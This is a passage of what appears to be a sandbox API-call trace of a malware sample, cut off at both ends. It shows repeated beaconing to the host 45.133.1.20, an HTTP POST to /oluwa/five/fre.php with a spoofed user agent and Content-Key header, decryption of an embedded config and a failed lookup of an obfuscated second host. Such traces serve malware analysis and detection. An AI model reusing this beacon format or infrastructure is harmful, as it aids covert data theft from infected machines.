Size=0x20) returned 0x6b3580 [0239.322] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0239.322] GetProcessHeap () returned 0x6a0000 [0239.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0239.322] socket (af=2, type=1, protocol=6) returned 0x794 [0239.323] connect (s=0x794, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0239.355] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0239.355] GetProcessHeap () returned 0x6a0000 [0239.355] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0239.355] GetProcessHeap () returned 0x6a0000 [0239.355] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dbf30 [0239.356] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0239.357] wvsprintfA (in: param_1=0x6dbf30, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0239.357] GetProcessHeap () returned 0x6a0000 [0239.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dbe10 [0239.357] GetProcessHeap () returned 0x6a0000 [0239.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0239.358] GetProcessHeap () returned 0x6a0000 [0239.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0239.358] GetProcessHeap () returned 0x6a0000 [0239.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dbf30 [0239.359] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0239.359] wvsprintfA (in: param_1=0x6dbf30, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0239.359] GetProcessHeap () returned 0x6a0000 [0239.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0239.360] GetProcessHeap () returned 0x6a0000 [0239.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0239.360] send (s=0x794, buf=0x6bd460*, len=242, flags=0) returned 242 [0239.361] send (s=0x794, buf=0x6bb998*, len=159, flags=0) returned 159 [0239.362] GetProcessHeap () returned 0x6a0000 [0239.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0239.362] recv (in: s=0x794, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0239.428] GetProcessHeap () returned 0x6a0000 [0239.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0239.429] GetProcessHeap () returned 0x6a0000 [0239.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0239.429] GetProcessHeap () returned 0x6a0000 [0239.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbe10 | out: hHeap=0x6a0000) returned 1 [0239.431] GetProcessHeap () returned 0x6a0000 [0239.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0239.431] closesocket (s=0x794) returned 0 [0239.431] GetProcessHeap () returned 0x6a0000 [0239.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0239.432] GetProcessHeap () returned 0x6a0000 [0239.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0239.432] GetProcessHeap () returned 0x6a0000 [0239.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0239.433] GetProcessHeap () returned 0x6a0000 [0239.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0239.433] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14c8) returned 0x794 [0239.435] Sleep (dwMilliseconds=0xea60) [0239.437] GetProcessHeap () returned 0x6a0000 [0239.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0239.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.439] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0239.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.450] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0239.462] GetProcessHeap () returned 0x6a0000 [0239.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0239.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.464] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0239.465] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.465] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0239.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.469] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0239.469] GetProcessHeap () returned 0x6a0000 [0239.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0239.471] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.471] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0239.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.472] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0239.473] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.474] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0239.474] GetProcessHeap () returned 0x6a0000 [0239.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0239.481] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.481] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0239.482] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.483] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0239.484] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.484] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0239.485] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.485] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0239.485] GetProcessHeap () returned 0x6a0000 [0239.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0239.485] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0239.486] GetProcessHeap () returned 0x6a0000 [0239.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0239.486] GetProcessHeap () returned 0x6a0000 [0239.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0239.487] GetProcessHeap () returned 0x6a0000 [0239.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0239.487] GetProcessHeap () returned 0x6a0000 [0239.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0239.492] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.492] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0239.503] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.503] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0239.516] GetProcessHeap () returned 0x6a0000 [0239.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0239.517] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.517] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0239.518] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.518] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0239.519] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.520] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0239.520] GetProcessHeap () returned 0x6a0000 [0239.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0239.521] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.522] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0239.523] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.523] CryptDestroyKey (hKey=0x6ad020) returned 1 [0239.524] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.525] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0239.525] GetProcessHeap () returned 0x6a0000 [0239.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0239.526] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.526] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0239.527] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.527] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0239.528] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.528] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0239.529] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.529] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0239.529] GetProcessHeap () returned 0x6a0000 [0239.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0239.529] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0239.529] GetProcessHeap () returned 0x6a0000 [0239.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baae0 [0239.529] socket (af=2, type=1, protocol=6) returned 0x798 [0239.530] connect (s=0x798, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0239.562] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0239.563] GetProcessHeap () returned 0x6a0000 [0239.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0239.563] GetProcessHeap () returned 0x6a0000 [0239.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dbf30 [0239.564] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0239.565] wvsprintfA (in: param_1=0x6dbf30, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0239.565] GetProcessHeap () returned 0x6a0000 [0239.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6db750 [0239.565] GetProcessHeap () returned 0x6a0000 [0239.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0239.565] GetProcessHeap () returned 0x6a0000 [0239.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0239.565] GetProcessHeap () returned 0x6a0000 [0239.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dbf30 [0239.566] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0239.567] wvsprintfA (in: param_1=0x6dbf30, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0239.567] GetProcessHeap () returned 0x6a0000 [0239.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0239.567] GetProcessHeap () returned 0x6a0000 [0239.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0239.568] send (s=0x798, buf=0x6bd460*, len=242, flags=0) returned 242 [0239.569] send (s=0x798, buf=0x6bb998*, len=159, flags=0) returned 159 [0239.569] GetProcessHeap () returned 0x6a0000 [0239.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0239.569] recv (in: s=0x798, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0239.632] GetProcessHeap () returned 0x6a0000 [0239.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0239.633] GetProcessHeap () returned 0x6a0000 [0239.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0239.633] GetProcessHeap () returned 0x6a0000 [0239.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db750 | out: hHeap=0x6a0000) returned 1 [0239.633] GetProcessHeap () returned 0x6a0000 [0239.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0239.634] closesocket (s=0x798) returned 0 [0239.634] GetProcessHeap () returned 0x6a0000 [0239.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baae0 | out: hHeap=0x6a0000) returned 1 [0239.634] GetProcessHeap () returned 0x6a0000 [0239.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0239.635] GetProcessHeap () returned 0x6a0000 [0239.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0239.635] GetProcessHeap () returned 0x6a0000 [0239.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0239.636] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14cc) returned 0x798 [0239.639] Sleep (dwMilliseconds=0xea60) [0239.641] GetProcessHeap () returned 0x6a0000 [0239.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0239.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.643] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0239.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.652] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0239.663] GetProcessHeap () returned 0x6a0000 [0239.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0239.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.665] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0239.666] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.666] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0239.667] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.668] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0239.668] GetProcessHeap () returned 0x6a0000 [0239.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0239.672] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.672] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0239.673] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.673] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0239.676] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.676] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0239.676] GetProcessHeap () returned 0x6a0000 [0239.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0239.677] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.677] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0239.678] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.679] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0239.679] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.680] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0239.683] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.683] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0239.683] GetProcessHeap () returned 0x6a0000 [0239.684] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0239.684] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0239.684] GetProcessHeap () returned 0x6a0000 [0239.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0239.685] GetProcessHeap () returned 0x6a0000 [0239.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0239.686] GetProcessHeap () returned 0x6a0000 [0239.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0239.686] GetProcessHeap () returned 0x6a0000 [0239.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0239.687] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.687] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0239.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.697] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0239.705] GetProcessHeap () returned 0x6a0000 [0239.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0239.706] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.706] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0239.707] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.765] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0239.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.767] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0239.767] GetProcessHeap () returned 0x6a0000 [0239.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0239.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.783] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0239.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.784] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0239.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.785] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0239.785] GetProcessHeap () returned 0x6a0000 [0239.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0239.786] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.786] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0239.787] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.787] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0239.788] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.788] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0239.789] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.789] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0239.789] GetProcessHeap () returned 0x6a0000 [0239.789] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0239.789] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0239.789] GetProcessHeap () returned 0x6a0000 [0239.789] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab00 [0239.789] socket (af=2, type=1, protocol=6) returned 0x79c [0239.790] connect (s=0x79c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0239.819] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, 